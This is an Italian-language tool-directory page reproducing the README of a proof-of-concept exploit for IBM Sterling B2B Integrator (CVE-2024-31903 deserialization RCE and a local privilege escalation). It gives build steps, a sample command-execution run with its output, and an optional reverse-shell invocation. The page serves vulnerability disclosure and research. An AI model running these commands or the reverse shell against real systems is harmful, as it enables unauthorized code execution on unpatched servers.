Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ibm-sterling-b2b-integrator-poc — Codice PoC per gli attacchi LPE e RCE (CVE-2024-31903) contro l'IBM Sterling B2B Integrator | Kitploit
Strumenti/GitHubGitHub/reverseclabs/ibm-sterling-b2b-integrator-poc
Analisi delle VulnerabilitàExploitPenetration TestingCommand and ControlSviluppo PayloadBinary Exploitation
GitHubreverseclabs/ibm-sterling-b2b-integrator-poc

ibm-sterling-b2b-integrator-poc

Codice PoC per gli attacchi LPE e RCE (CVE-2024-31903) contro l'IBM Sterling B2B Integrator

Vedi Repository
1161 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

IBM Sterling B2B Integrator PoC

Codice proof of concept per lo sfruttamento delle vulnerabilità scoperte contro IBM Sterling B2B Integrator, versioni da 6.2.0.0 a 6.2.0.2, e da 6.0.0.0 a 6.1.2.5 per sistemi Linux, Windows e AIX:

  • Iniezione di comandi LPE - se l'autenticazione è disabilitata
  • Deserializzazione RCE senza autenticazione - identificata come CVE-2024-31903, vedi il relativo advisory IBM qui: https://www.ibm.com/support/pages/node/7172233

Maggiori dettagli su questi problemi sono disponibili nel mio talk al DistricCon "To B or not 2B: Breaking the IBM B2B Integrator with, and without authentication":

https://www.districtcon.org/bios-and-talks-2025/to-b-or-not-to-b

Struttura del Repository

La maggior parte del codice in questo repository si riferisce all'attacco di iniezione di comandi LPE.

Il client binario Python bin_client.py può essere utilizzato per inviare messaggi manualmente a CLA2, consentendo lo sfruttamento della vulnerabilità RCE di deserializzazione.

Utilizzo

$ java Main
$ Usage: Main <cmdLine> <outfile_or_SEND> [host] [port]

Il PoC accetta due parametri:

  • Il comando shell da eseguire dal client CLA2 target
  • Un percorso per scrivere il messaggio Java serializzato su disco, per essere poi analizzato/inviato manualmente con qualcosa come bin_client.py, oppure la stringa "SEND" per inviarlo immediatamente a host:porta dove un client CLA2 è in ascolto

Istruzioni

Il codice sorgente incluso in questo repository è deliberatamente incompleto, poiché sono necessarie alcune classi del sottosistema CLA2. A seconda dei permessi del filesystem della directory di installazione, potresti essere in grado di accedere ai file JAR

Supponendo che tu abbia recuperato i file pertinenti dalla decompilazione dei JAR. Non verranno caricati qui in quanto costituiscono proprietà intellettuale IBM

  1. Decompila CLA2Client.jar

  2. Nel codice decompilato, individua i file CmdLine2Result.java e CmdLine2Parms.java

  3. Copia e incollali accanto a Main.java per replicare la struttura delle directory del pacchetto Java dell'applicazione originale

/src/com/sterlingcommerce/woodstock/services/cmdline2/
  1. Compila il programma PoC - idealmente usando il JDK fornito con l'applicazione
${B2BHOME}/INSTALL/jdk/bin/javac src/com/sterlingcommerce/woodstock/services/cmdline2/*.java
  1. Eseguilo - di nuovo, usando il JDK fornito con l'applicazione se possibile
${B2BHOME}/appl/SFG/INSTALL/jdk/bin/java -classpath src/ com.sterlingcommerce.woodstock.services.cmdline2.Main '/bin/sh -c "id > /tmp/result"' SEND 127.0.0.1 5052
[+] Creating object...
[+] Sending object to 127.0.0.1:5052...
[+] ...Sent!
[+] Receiving header...
[+] ...header received: RESULT
[+] Receiving result...
[+] Result received:
##[DEBUG]## CmdLine2Result:
fileSize=0
outputNameLong=null
outputNameShort=null
******* end of CmdLine2Result *******
[+] clr.statusRpt:       null
[+] clr.exceptionString: null
[+] clr.somethingToLog:  CmdLine2Thread.runCommand: cmdLine before execution=/bin/sh -c "id > /tmp/result"
##[REMOTE DEBUG]## parm0=/bin/sh
##[REMOTE DEBUG]## parm1=-c
##[REMOTE DEBUG]## parm2=id > /tmp/result 
  1. (Opzionale) Per ottenere una shell completamente interattiva, carica gli script revshell.py e revshell_listener.py sul sistema target, e avvia il listener. Poi, sostituisci il parametro del comando del PoC con un'invocazione dello script della reverse shell come di seguito:
${B2BHOME}/INSTALL/jdk/bin/java -classpath src/ com.sterlingcommerce.woodstock.services.cmdline2.Main 'python3 /tmp/revshell.py 9090' SEND
Scarica lo strumento